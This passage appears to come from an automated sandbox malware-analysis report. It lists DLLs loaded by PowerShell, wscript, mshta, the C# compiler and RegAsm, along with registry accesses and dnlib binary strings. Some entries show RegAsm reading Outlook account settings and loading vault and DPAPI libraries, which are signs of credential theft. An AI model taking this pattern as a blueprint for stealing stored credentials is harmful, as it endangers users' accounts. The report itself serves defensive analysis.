                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2387421374.0000000007890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbSyMB source: powershell.exe, 00000003.00000002.2133431381.000000000886F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
